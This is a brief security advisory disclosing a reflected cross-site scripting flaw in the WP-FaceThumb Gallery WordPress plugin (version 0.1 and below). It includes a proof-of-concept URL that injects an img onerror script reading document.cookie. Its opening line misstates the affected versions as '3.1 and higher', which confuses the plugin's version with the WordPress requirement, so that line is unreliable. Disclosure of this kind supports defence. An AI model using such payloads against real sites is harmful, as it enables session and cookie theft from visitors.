WordPress WP-FaceThumb Gallery plugin versions 3.1 and higher suffer from a cross site scripting vulnerability.
9beec02367ad1737a52b89f4f90216d274bf0044e74cac21b7b7924057dad896
###########################################################################################################
# Wordpress WP-FaceThumb Gallery Plugin <= 0.1 Reflected XSS Vulnerability
# Plugin Page : http://wordpress.org/extend/plugins/wp-facethumb/
# Requires: Wordpress v.3.1 or higher
# Date: 13-05-2012
# Author : Avram Marius Gabriel (d3v1l)
# RandomStorm - http://www.randomstorm.com
# Tested on: Windows XP & 7
############################################################################################################
# POC:
# http://localhost/?page_id=1&pagination_wp_facethumb=1"><img/src=x onerror=alert(document.cookie)>
############################################################################################################
# Description:
# This plugin allows your visitor to take a snapshot whith a webcam and the thumb is display on your sidebar.
# The visitor indicate his pseudo and can let an URL which will be link to the thumb.
############################################################################################################